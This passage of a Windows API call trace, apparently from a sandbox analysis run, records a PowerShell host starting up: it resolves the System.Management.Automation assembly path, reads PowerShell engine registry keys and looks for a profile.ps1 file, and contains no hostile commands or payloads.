lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.442] GetLastError () returned 0xcb [0053.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.442] GetLastError () returned 0xcb [0053.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.442] GetLastError () returned 0xcb [0053.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.442] GetLastError () returned 0xcb [0053.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.448] GetLastError () returned 0xcb [0053.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.448] GetLastError () returned 0xcb [0053.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.448] GetLastError () returned 0xcb [0053.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.448] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.472] GetLastError () returned 0xcb [0053.479] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.485] GetLastError () returned 0xcb [0053.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.486] GetLastError () returned 0xcb [0053.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.489] GetLastError () returned 0xcb [0053.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.491] GetLastError () returned 0xcb [0053.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.491] GetLastError () returned 0xcb [0053.492] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.492] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.541] GetLastError () returned 0xcb [0053.573] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.576] GetLastError () returned 0xcb [0053.837] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x3225d8 [0053.837] GetLastError () returned 0x0 [0053.837] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x322440 [0053.837] GetLastError () returned 0x0 [0053.950] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.962] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.964] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.965] VirtualQuery (in: lpAddress=0x14c914, lpBuffer=0x14d914, dwLength=0x1c | out: lpBuffer=0x14d914*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.038] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.038] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.038] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.038] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.049] GetLastError () returned 0xcb [0054.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.050] GetLastError () returned 0xcb [0054.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.050] GetLastError () returned 0xcb [0054.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.051] GetLastError () returned 0xcb [0054.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.051] GetLastError () returned 0xcb [0054.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.051] GetLastError () returned 0xcb [0054.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.068] GetLastError () returned 0xcb [0054.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.068] GetLastError () returned 0xcb [0054.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.068] GetLastError () returned 0xcb [0054.068] VirtualQuery (in: lpAddress=0x14d588, lpBuffer=0x14e588, dwLength=0x1c | out: lpBuffer=0x14e588*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.069] GetLastError () returned 0xcb [0054.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.069] GetLastError () returned 0xcb [0054.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.069] GetLastError () returned 0xcb [0054.069] VirtualQuery (in: lpAddress=0x14d580, lpBuffer=0x14e580, dwLength=0x1c | out: lpBuffer=0x14e580*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.069] VirtualQuery (in: lpAddress=0x14d234, lpBuffer=0x14e234, dwLength=0x1c | out: lpBuffer=0x14e234*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.069] VirtualQuery (in: lpAddress=0x14d234, lpBuffer=0x14e234, dwLength=0x1c | out: lpBuffer=0x14e234*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.071] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ecbc | out: phkResult=0x14ecbc*=0x374) returned 0x0 [0054.071] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ed04, lpData=0x0, lpcbData=0x14ed00*=0x0 | out: lpType=0x14ed04*=0x1, lpData=0x0, lpcbData=0x14ed00*=0x56) returned 0x0 [0054.071] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ed04, lpData=0x3175c0, lpcbData=0x14ed00*=0x56 | out: lpType=0x14ed04*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ed00*=0x56) returned 0x0 [0054.071] RegCloseKey (hKey=0x374) returned 0x0 [0054.071] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ecbc | out: phkResult=0x14ecbc*=0x374) returned 0x0 [0054.072] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ed04, lpData=0x0, lpcbData=0x14ed00*=0x0 | out: lpType=0x14ed04*=0x1, lpData=0x0, lpcbData=0x14ed00*=0x56) returned 0x0 [0054.072] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ed04, lpData=0x3175c0, lpcbData=0x14ed00*=0x56 | out: lpType=0x14ed04*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ed00*=0x56) returned 0x0 [0054.072] RegCloseKey (hKey=0x374) returned 0x0 [0054.072] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3175c0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0054.072] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0054.072] GetLastError () returned 0x3f0 [0054.072] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3175c0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0054.072] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0054.072] GetLastError () returned 0x3f0 [0054.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0054.073] GetLastError () returned 0x3f0 [0054.073] SetErrorMode (uMode=0x1) returned 0x1 [0054.073] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14ed6c | out: lpFileInformation=0x14ed6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.073] GetLastError () returned 0x2 [0054.073] SetErrorMode (uMode=0x1) returned 0x1 [0054.073] GetFullPathNameW (in: 